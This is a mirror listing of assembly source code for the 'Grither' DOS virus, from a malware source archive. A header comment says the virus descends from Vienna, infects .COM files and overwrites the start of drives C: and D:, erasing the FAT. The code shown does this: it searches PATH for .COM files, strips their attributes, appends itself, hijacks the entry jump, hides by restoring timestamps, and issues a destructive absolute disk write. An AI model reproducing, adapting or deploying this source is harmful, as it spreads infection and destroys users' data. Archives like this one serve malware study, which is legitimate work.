mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-11 21:05:28 +00:00
330 lines
7.8 KiB
NASM
330 lines
7.8 KiB
NASM
|
|
|||
|
;**************************************************************************
|
|||
|
;** GRITHER VIRUS **
|
|||
|
;** Created: 27 Oct 1990 **
|
|||
|
;** [NukE] Notes: Does come from the Vienna Virus! And copies itself on **
|
|||
|
;** *.COMs and will re-write the begining sectors of drive **
|
|||
|
;** C: & D:! Erasing the FATs area... **
|
|||
|
;** **
|
|||
|
;** Sources Brought to you by -> Rock Steady [NukE]s Head Programmer! **
|
|||
|
;** **
|
|||
|
;**************************************************************************
|
|||
|
|
|||
|
data_1e equ 2Ch ; (65AC:002C=0)
|
|||
|
data_2e equ 75h ; (65AC:0075=0)
|
|||
|
data_3e equ 79h ; (65AC:0079=0)
|
|||
|
|
|||
|
seg_a segment byte public
|
|||
|
assume cs:seg_a, ds:seg_a
|
|||
|
|
|||
|
|
|||
|
org 100h
|
|||
|
|
|||
|
grither proc far
|
|||
|
|
|||
|
start:
|
|||
|
;* jmp short loc_1 ;*(0112)
|
|||
|
db 0EBh, 10h
|
|||
|
db 90h
|
|||
|
data_5 db '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Q<EFBFBD>', 9, 3, '<27><><EFBFBD><EFBFBD><EFBFBD>' ; Data table (indexed access)
|
|||
|
db 0Ah, 0
|
|||
|
db 0BFh, 0, 1, 0B9h, 3, 0
|
|||
|
db 0F3h, 0A4h, 8Bh, 0F2h, 0B4h, 30h
|
|||
|
db 0CDh, 21h, 3Ch, 0, 75h, 3
|
|||
|
db 0E9h, 0C5h, 1
|
|||
|
loc_2:
|
|||
|
push es
|
|||
|
mov ah,2Fh ; '/'
|
|||
|
int 21h ; DOS Services ah=function 2Fh
|
|||
|
; get DTA ptr into es:bx
|
|||
|
mov [si+0],bx
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
mov [si+2],es
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
pop es
|
|||
|
mov dx,5Fh
|
|||
|
nop
|
|||
|
add dx,si
|
|||
|
mov ah,1Ah
|
|||
|
int 21h ; DOS Services ah=function 1Ah
|
|||
|
; set DTA to ds:dx
|
|||
|
push es
|
|||
|
push si
|
|||
|
mov es,ds:data_1e ; (65AC:002C=0)
|
|||
|
mov di,0
|
|||
|
loc_3:
|
|||
|
pop si
|
|||
|
push si
|
|||
|
add si,1Ah
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
lodsb ; String [si] to al
|
|||
|
mov cx,8000h
|
|||
|
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
|
|||
|
mov cx,4
|
|||
|
|
|||
|
locloop_4:
|
|||
|
lodsb ; String [si] to al
|
|||
|
scasb ; Scan es:[di] for al
|
|||
|
jnz loc_3 ; Jump if not zero
|
|||
|
loop locloop_4 ; Loop if cx > 0
|
|||
|
|
|||
|
pop si
|
|||
|
pop es
|
|||
|
mov [si+16h],di
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
mov di,si
|
|||
|
nop
|
|||
|
add di,1Fh
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
mov bx,si
|
|||
|
add si,1Fh
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
mov di,si
|
|||
|
jmp short loc_10 ; (01B9)
|
|||
|
loc_5:
|
|||
|
cmp word ptr [si+16h],0
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
jne loc_6 ; Jump if not equal
|
|||
|
jmp loc_19 ; (02E9)
|
|||
|
loc_6:
|
|||
|
push ds
|
|||
|
push si
|
|||
|
mov ds,es:data_1e ; (65AC:002C=0)
|
|||
|
mov di,si
|
|||
|
mov si,es:[di+16h]
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
add di,1Fh
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
loc_7:
|
|||
|
lodsb ; String [si] to al
|
|||
|
cmp al,3Bh ; ';'
|
|||
|
je loc_9 ; Jump if equal
|
|||
|
cmp al,0
|
|||
|
je loc_8 ; Jump if equal
|
|||
|
stosb ; Store al to es:[di]
|
|||
|
jmp short loc_7 ; (019B)
|
|||
|
loc_8:
|
|||
|
mov si,0
|
|||
|
loc_9:
|
|||
|
pop bx
|
|||
|
pop ds
|
|||
|
mov [bx+16h],si
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
nop
|
|||
|
cmp ch,5Ch ; '\'
|
|||
|
je loc_10 ; Jump if equal
|
|||
|
mov al,5Ch ; '\'
|
|||
|
stosb ; Store al to es:[di]
|
|||
|
loc_10:
|
|||
|
mov [bx+18h],di
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
mov si,bx
|
|||
|
add si,10h
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
mov cx,6
|
|||
|
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
|
|||
|
mov si,bx
|
|||
|
mov ah,4Eh ; 'N'
|
|||
|
mov dx,1Fh
|
|||
|
nop
|
|||
|
add dx,si
|
|||
|
mov cx,3
|
|||
|
int 21h ; DOS Services ah=function 4Eh
|
|||
|
; find 1st filenam match @ds:dx
|
|||
|
jmp short loc_12 ; (01DD)
|
|||
|
loc_11:
|
|||
|
mov ah,4Fh ; 'O'
|
|||
|
int 21h ; DOS Services ah=function 4Fh
|
|||
|
; find next filename match
|
|||
|
loc_12:
|
|||
|
jnc loc_13 ; Jump if carry=0
|
|||
|
jmp short loc_5 ; (017F)
|
|||
|
loc_13:
|
|||
|
mov ax,ds:data_2e[si] ; (65AC:0075=0)
|
|||
|
and al,1Fh
|
|||
|
cmp al,1Fh
|
|||
|
je loc_11 ; Jump if equal
|
|||
|
cmp word ptr ds:data_3e[si],0FA00h ; (65AC:0079=0)
|
|||
|
ja loc_11 ; Jump if above
|
|||
|
cmp word ptr ds:data_3e[si],0Ah ; (65AC:0079=0)
|
|||
|
jb loc_11 ; Jump if below
|
|||
|
mov di,[si+18h]
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
push si
|
|||
|
add si,7Dh
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
loc_14:
|
|||
|
lodsb ; String [si] to al
|
|||
|
stosb ; Store al to es:[di]
|
|||
|
cmp al,0
|
|||
|
jne loc_14 ; Jump if not equal
|
|||
|
pop si
|
|||
|
mov ax,4300h
|
|||
|
mov dx,1Fh
|
|||
|
nop
|
|||
|
add dx,si
|
|||
|
int 21h ; DOS Services ah=function 43h
|
|||
|
; get/set file attrb, nam@ds:dx
|
|||
|
mov [si+8],cx
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
mov ax,4301h
|
|||
|
and cx,0FFFEh
|
|||
|
mov dx,1Fh
|
|||
|
nop
|
|||
|
add dx,si
|
|||
|
int 21h ; DOS Services ah=function 43h
|
|||
|
; get/set file attrb, nam@ds:dx
|
|||
|
mov ax,3D02h
|
|||
|
mov dx,1Fh
|
|||
|
nop
|
|||
|
add dx,si
|
|||
|
int 21h ; DOS Services ah=function 3Dh
|
|||
|
; open file, al=mode,name@ds:dx
|
|||
|
jnc loc_15 ; Jump if carry=0
|
|||
|
jmp loc_18 ; (02DA)
|
|||
|
loc_15:
|
|||
|
mov bx,ax
|
|||
|
mov ax,5700h
|
|||
|
int 21h ; DOS Services ah=function 57h
|
|||
|
; get/set file date & time
|
|||
|
mov [si+4],cx
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
mov [si+6],dx
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
mov ah,2Ch ; ','
|
|||
|
int 21h ; DOS Services ah=function 2Ch
|
|||
|
; get time, cx=hrs/min, dh=sec
|
|||
|
and dh,7
|
|||
|
jnz loc_16 ; Jump if not zero
|
|||
|
mov ah,40h ; '@'
|
|||
|
mov cx,85h
|
|||
|
mov dx,si
|
|||
|
add dx,8Ah
|
|||
|
int 21h ; DOS Services ah=function 40h
|
|||
|
; write file cx=bytes, to ds:dx
|
|||
|
jmp short loc_17 ; (02C3)
|
|||
|
db 90h
|
|||
|
loc_16:
|
|||
|
mov ah,3Fh ; '?'
|
|||
|
mov cx,3
|
|||
|
mov dx,0Ah
|
|||
|
nop
|
|||
|
add dx,si
|
|||
|
int 21h ; DOS Services ah=function 3Fh
|
|||
|
; read file, cx=bytes, to ds:dx
|
|||
|
jc loc_17 ; Jump if carry Set
|
|||
|
cmp ax,3
|
|||
|
jne loc_17 ; Jump if not equal
|
|||
|
mov ax,4202h
|
|||
|
mov cx,0
|
|||
|
mov dx,0
|
|||
|
int 21h ; DOS Services ah=function 42h
|
|||
|
; move file ptr, cx,dx=offset
|
|||
|
jc loc_17 ; Jump if carry Set
|
|||
|
mov cx,ax
|
|||
|
sub ax,3
|
|||
|
mov [si+0Eh],ax
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
add cx,2F7h
|
|||
|
mov di,si
|
|||
|
sub di,1F5h
|
|||
|
mov [di],cx
|
|||
|
mov ah,40h ; '@'
|
|||
|
mov cx,306h
|
|||
|
mov dx,si
|
|||
|
sub dx,1F7h
|
|||
|
int 21h ; DOS Services ah=function 40h
|
|||
|
; write file cx=bytes, to ds:dx
|
|||
|
jc loc_17 ; Jump if carry Set
|
|||
|
cmp ax,306h
|
|||
|
jne loc_17 ; Jump if not equal
|
|||
|
mov ax,4200h
|
|||
|
mov cx,0
|
|||
|
mov dx,0
|
|||
|
int 21h ; DOS Services ah=function 42h
|
|||
|
; move file ptr, cx,dx=offset
|
|||
|
jc loc_17 ; Jump if carry Set
|
|||
|
mov ah,40h ; '@'
|
|||
|
mov cx,3
|
|||
|
mov dx,si
|
|||
|
add dx,0Dh
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
int 21h ; DOS Services ah=function 40h
|
|||
|
; write file cx=bytes, to ds:dx
|
|||
|
loc_17:
|
|||
|
mov dx,[si+6]
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
mov cx,[si+4]
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
and cx,0FFE0h
|
|||
|
or cx,1Fh
|
|||
|
mov ax,5701h
|
|||
|
int 21h ; DOS Services ah=function 57h
|
|||
|
; get/set file date & time
|
|||
|
mov ah,3Eh ; '>'
|
|||
|
int 21h ; DOS Services ah=function 3Eh
|
|||
|
; close file, bx=file handle
|
|||
|
loc_18:
|
|||
|
mov ax,4301h
|
|||
|
mov cx,[si+8]
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
mov dx,1Fh
|
|||
|
nop
|
|||
|
add dx,si
|
|||
|
int 21h ; DOS Services ah=function 43h
|
|||
|
; get/set file attrb, nam@ds:dx
|
|||
|
loc_19:
|
|||
|
push ds
|
|||
|
mov ah,1Ah
|
|||
|
mov dx,[si+0]
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
mov ds,[si+2]
|
|||
|
nop ;*Fixup for MASM (M)
|
|||
|
int 21h ; DOS Services ah=function 1Ah
|
|||
|
; set DTA to ds:dx
|
|||
|
pop ds
|
|||
|
loc_20:
|
|||
|
pop cx
|
|||
|
xor ax,ax ; Zero register
|
|||
|
xor bx,bx ; Zero register
|
|||
|
xor dx,dx ; Zero register
|
|||
|
xor si,si ; Zero register
|
|||
|
mov di,100h
|
|||
|
push di
|
|||
|
xor di,di ; Zero register
|
|||
|
retn 0FFFFh
|
|||
|
db 10 dup (0)
|
|||
|
db 0CDh, 20h, 90h, 0E9h, 0, 0
|
|||
|
db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0
|
|||
|
db 0, 0, 0, 0, 50h, 41h
|
|||
|
db 54h, 48h, 3Dh, 0, 0
|
|||
|
db 105 dup (0)
|
|||
|
db 0EBh, 58h, 90h
|
|||
|
db ' `7O `88@99@6r `65@85M%AACC%YMJ%'
|
|||
|
db 'LWNYMJW%AACC% `:@86@95r `68@87MH'
|
|||
|
db 'tzwyjx~%tk%Jqj}nts `5r$'
|
|||
|
db '3'
|
|||
|
db 0C0h, 8Eh, 0D8h, 0B0h, 2, 0B9h
|
|||
|
db 0A0h, 0, 33h, 0D2h, 0BBh, 0
|
|||
|
db 0, 0CDh, 26h, 0BBh, 0, 0
|
|||
|
loc_21:
|
|||
|
cmp byte ptr data_5[bx],24h ; (65AC:0103=90h) '$'
|
|||
|
je loc_22 ; Jump if equal
|
|||
|
sub byte ptr data_5[bx],5 ; (65AC:0103=90h)
|
|||
|
inc bx
|
|||
|
jmp short loc_21 ; (0400)
|
|||
|
loc_22:
|
|||
|
mov dx,offset data_5 ; (65AC:0103=90h)
|
|||
|
mov ah,9
|
|||
|
int 21h ; DOS Services ah=function 09h
|
|||
|
; display char string at ds:dx
|
|||
|
int 20h ; Program Terminate
|
|||
|
|
|||
|
grither endp
|
|||
|
|
|||
|
seg_a ends
|
|||
|
|
|||
|
|
|||
|
|
|||
|
end start
|
|||
|
|